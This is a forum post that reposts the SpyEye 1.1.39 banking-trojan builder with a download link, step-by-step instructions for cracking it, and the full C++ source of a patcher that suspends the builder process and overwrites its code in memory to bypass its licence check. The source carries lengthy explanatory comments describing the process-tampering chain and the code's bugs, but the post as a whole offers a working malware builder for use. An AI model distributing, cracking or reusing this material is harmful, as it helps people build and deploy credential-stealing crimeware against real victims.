Nytro

SpyEye.1.1.39.Builder+Patch



SpyEye.1.1.39.Builder+Patch

Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Nici nu stiu daca mai e postat.

1709b.png

1.Start SpyEye.exe

2.Start SpyEyePatch.exe - Klick OK

3.Klick Ok in SpyEye error message and enjoy the Builder

Download:

http://www.multiupload.com/ZEAYSEAU4W

SpyEyePatch SourceCode:

#include <Windows.h>
#include <tlhelp32.h>

typedef LONG ( NTAPI *_NtSuspendProcess )( IN HANDLE ProcessHandle );
typedef LONG ( NTAPI *_NtResumeProcess )( IN HANDLE ProcessHandle );

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
/*
 * Entry point. Looks for a running process whose image name is
 * "SpyEye.exe", suspends it, overwrites four fixed virtual addresses in
 * that process with the byte strings declared below, shows a message box,
 * then resumes the process and exits.
 *
 * From a defender's point of view the call sequence is the standard
 * cross-process tampering chain: enable SeDebugPrivilege -> Toolhelp
 * snapshot -> OpenProcess(PROCESS_ALL_ACCESS) -> NtSuspendProcess ->
 * WriteProcessMemory -> NtResumeProcess. Each step is observable (token
 * privilege adjustment, process handle open with full access, remote
 * memory write), which is what detection rules for process injection /
 * in-memory patching key on.
 *
 * Returns 0 on every path, including all failure paths, so the exit code
 * carries no success/failure information.
 */

/* --- Step 1: enable SeDebugPrivilege on this process's own token. --- */
/* None of the four calls in this step has its result checked. */
TOKEN_PRIVILEGES priv;
HANDLE hThis, hToken;
LUID luid;
hThis = GetCurrentProcess();
OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
/* NOTE(review): the literal is spelled with a lowercase 's'; the canonical
 * constant is SE_DEBUG_NAME ("SeDebugPrivilege"). Because the return value
 * is ignored, a failed lookup would leave `luid` uninitialized and go
 * unnoticed -- confirm the lookup succeeds as written. */
LookupPrivilegeValue(0, "seDebugPrivilege", &luid);
priv.PrivilegeCount = 1;
priv.Privileges[0].Luid = luid;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
/* `false` is a C++ keyword; in C it would need <stdbool.h>, which is not
 * included here -- the source appears to be compiled as C++. */
AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0);
CloseHandle(hToken);
/* GetCurrentProcess() returns a pseudo-handle; closing it has no effect. */
CloseHandle(hThis);

/* --- Step 2: locals for the process lookup and the patch. --- */
HANDLE ProcessHandle = 0;
_NtSuspendProcess NtSuspendProcess = 0;
_NtResumeProcess NtResumeProcess = 0;
PROCESSENTRY32 processInfo;
processInfo.dwSize = sizeof(processInfo);
/* Snapshot of all processes; checked against INVALID_HANDLE_VALUE below. */
HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
/* Image name compared case-sensitively (strcmp) against szExeFile. */
CHAR processName[] = "SpyEye.exe";
DWORD PID = 0 ;


/* Absolute virtual addresses inside the target image (see the disassembly
 * comment further down). They are specific to the single build this post
 * is about and to an image mapped at its preferred base; against any other
 * image the writes below land at whatever happens to be at these
 * addresses. No validation of the target's version or base is performed. */
DWORD Patch1 = 0x4010C5;
DWORD Patch2 = 0x4010CA;
DWORD Patch3 = 0x4010CC;
DWORD Patch4 = 0x4010CD;

/* Declared as string literals, so each array carries a trailing '\0';
 * the sizeof(...)-1 in the WriteProcessMemory calls drops that terminator
 * and writes only the opcode bytes. */
UCHAR PatchVal1[] = "\xB8\x0C\x11\x40\x00";
UCHAR PatchVal2[] = "\xFF\xD0";
UCHAR PatchVal3[] = "\x90";
UCHAR PatchVal4[] = "\x90";


/* Resolve the two undocumented ntdll exports at runtime. If either
 * GetProcAddress returned NULL, the calls in Step 4 would dereference a
 * null function pointer -- neither result is checked. */
NtSuspendProcess = (_NtSuspendProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtSuspendProcess" );
NtResumeProcess = (_NtResumeProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtResumeProcess" );


/* --- Step 3: find the PID of the first process named "SpyEye.exe". --- */
if ( processesSnapshot == INVALID_HANDLE_VALUE ){
return 0;
}
/* The entry filled in by Process32First is never compared; the loop only
 * examines entries returned by Process32Next. */
Process32First(processesSnapshot, &processInfo);

while ( Process32Next(processesSnapshot, &processInfo)){
if ( !strcmp(processName,processInfo.szExeFile)){
/* The snapshot handle is closed only on this match path; when no process
 * matches, the loop ends and the handle is never closed (leak). */
CloseHandle(processesSnapshot);
PID = processInfo.th32ProcessID;
break;
}
}
/* Compares a DWORD with the pointer constant NULL; equivalent to PID != 0. */
if(PID != NULL){
//MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0);
/* Full-access handle to the target; this is the call SeDebugPrivilege was
 * enabled for. Returns NULL on failure, which the next check covers. */
ProcessHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID);
}
/* --- Step 4: suspend, write the four byte strings, notify, resume. --- */
if ( ProcessHandle != NULL ){
NtSuspendProcess( ProcessHandle );

/* Return values are ignored and the bytes-written out-parameter is NULL,
 * so a failed or partial write is not detected before the target is
 * resumed. `&PatchValN` is a pointer to the array object, which has the
 * same address as its first element. */
WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4)-1, NULL);
/*
 * What the target's code looks like after the four writes land
 * (original author's disassembly listing):
 *
 * 004010C5 B8 0C114000 MOV EAX,SpyEye.0040110C
 * 004010CA FFD0 CALL EAX
 * 004010CC 90 NOP
 * 004010CD 90 NOP
 */
/* Shown while the target is still suspended; the box is modal, so the
 * target stays suspended until the user dismisses it. */
MessageBoxA(NULL,"SpyEye should have been patched now.\nJust press OK and enjoy","SpyEye-Patch by Zer0Flag",0);

NtResumeProcess( ProcessHandle );
CloseHandle(ProcessHandle);
}
return 0;
}

Sursa: SpyEye.1.1.39.Builder+Patch - r00tsecurity
